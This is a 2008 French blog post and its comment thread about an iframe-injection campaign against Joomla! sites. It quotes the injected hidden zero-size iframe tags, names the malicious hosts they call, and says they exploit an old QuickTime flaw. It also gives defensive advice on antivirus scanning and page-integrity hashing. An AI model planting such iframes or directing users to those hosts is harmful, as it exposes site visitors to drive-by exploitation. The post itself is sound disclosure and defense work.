Overblog
Editer l'article Suivre ce blog Administration + Créer mon blog
17 octobre 2008 5 17 /10 /octobre /2008 01:19
Décidément, les cibles des attaques informatiques se diversifient de plus en plus, pour toucher des environnements ou des outils qu'on se soupçonnerait pas d'être visés...

Voici quelques éléments, concernant ce qui semble être une attaque visant Joomla! .
Au passage, un organisme spécialisé dans la veille virale m'a confirmé des attaques en cours contre Joomla!.

L'attaque semble consister à insérer une ou plusieurs balises iFrame dans le code du site piraté.

Ces balises pointent sur (entre autres) :
- http://wsx2host.net/count.php?o=
- http://pinoc.org/exploits/x7b.php
- msn-analytics.net/count.php?o=2

La recherche Google d'un de ces liens "malins" paraît également intéressante, et tend à montrer une réelle campagne d'attaque en cours :
http://www.google.fr/search?q=msn-analytics.net&btnG=Rechercher&hl=fr&rlz=1C1GGLS_frFR291&sa=2
On peut voir des administrateurs / webmasters qui ne comprennent pas ce qui arrive à leur site... et c'est souvent les utilisateurs qui leur signalent la présence du lien dangereux dans le code de leurs pages.
Les administrateurs suppriment le code malin, mais celui-ci revient souvent.


Exemple de balises iFrames injectées sur des sites (avec Joomla!) vulnérables :
iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe><?iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><?iframe>


On pourra noter la ressemblance entre : google-analytics.com et    ... msn-analytics.net !!
Est-ce volontaire ? le nom de cette balise est-il conçu ainsi pour sembler "inoffensif" à première vue ?
On peut se poser la question.

D'ailleurs, les équipes de MSN pourraient attaquer le propriétaire de ce site (msn-analytics.net), car "msn" est une marque déposée... et il semble que Google pourrait également attaquer sur le terme "analytics" :
http://www.google.com/analytics/tos.html
Lequel des 2 est visé réellement, mystère... peut-être les 2 ?


Détails concernant msn-analytics.net :


Avertissement de sécurité :
http://safeweb.norton.com/report/show?url=msn-analytics.net

Le WhoIs sur le site de la CNIL ne semble pas donner de réponse probante pour ce domaine. Heureusement, d'autres WhoIs semblent eux le connaitre :
http://www.whois.net/whois_new.cgi?d=msn-analytics&tld=net

On pourra noter que la date d'enregistrement du domaine est très récente, il semble donc qu'on ait affaire à une campagne également récente...

Mise à jour du 30/10/08 :

Des tests montrent que l'exploit tenté par le site "msn analytics", tout comme les 2 autres visiblement, concerne une vulnérabilité sur QuickTime.
La dernière version (7.5.5) en date de QuickTime ne s'est pas révélée vulnérable lors de la navigation sur le site.
De même, la version 7.2 ne s'est pas montrée vulnérable, tout comme la 7.1.6.
Je n'ai pas eu le temps de faire des tests avec les versions 6...

Cependant, on peut se poser les questions suivantes : s'agit-il d'une erreur dans la mise en place de l'exploitation de faille, peut-être que les éléments d'attaque ne sont pas tous opérationnels ? ou s'agit-il réellement de l'utilisation d'une ancienne faille (ce qui semble étonnant vu la récence de la campagne d'attaque des Joomla...).



Bref, encore une raison de :
- scanner les flux HTTP au niveau antiviral (passerelles ou postes, selon l'architecture)
- scanner en local les pages d'un serveur Web, ne serait-ce que de nuit (dans un Cron par exemple et avec un ClamAV... pour Unix / Linux). On peut également envisager simplement un contrôle d'intégrité de ces pages...
- ne pas cliquer sur tout lien dès l'instant qu'il contient 1 mot clé "connu"  (type "msn")....

Partager cet article

Repost0

commentaires

Guillaume Laforge 29/10/2008 21:47

Bonjour, grâce à un lecteur de mon blog, j'ai été averti que mon blog était infecté par cette iframe bizarre. Mais je ne sais pas du tout d'où ça vient et comment l'éradiquer de mon blog ! Mon blog est un Nucleus, c'est même pas du Joomla. J'aimerais bien savoir comment me débarrasser de ça ! Merci d'avance, si vous avez des pointeurs, je suis preneur.

Philippe V. 30/10/2008 23:26


Bonsoir,
Pour vous répondre, il me faudrait la configuration exacte de votre serveur :
- système d'exploitation (et mises à jour installées)
- serveur web
- composants activés / ajoutés au serveur web
- autres serveurs actifs (tout ce qui ouvre un port d'écoute)

Dores et déjà, je ne saurais trop vous conseiller de :
- mettre à jour tous les logiciels et autres composants installés sur votre serveur (dernières versions disponibles), incluant PHP, serveur web, BDD, RAT etc si présents...
- regarder dans les logs quelles sont les adresses IP "inconnues" qui ont tenté des opérations avec des erreurs, ou des opérations d'authentification

Par ailleurs, vous avez peut être un moyen de surveiller la situation : il vous suffit de générer un condensat (hash) de votre page qui est "piratée", par exemple via MD5 ou SHA1.
Puis, par script, vous regénérez de façon régulière ce condensat (toutes les heures par ex...), et vous comparez avec la version de référence. Quand la référence et le condensat nouvellement généré
ne concordent pas, il est probable que votre page ait de nouveau été piratée. Un petit mail / SMS pourra vous avertir en temps réel.
Bien évidemment, ce procédé suppose que le contenu de votre page n'évolue pas entre temps... sinon il faut regénérer le condensat de référence !

Bon courage.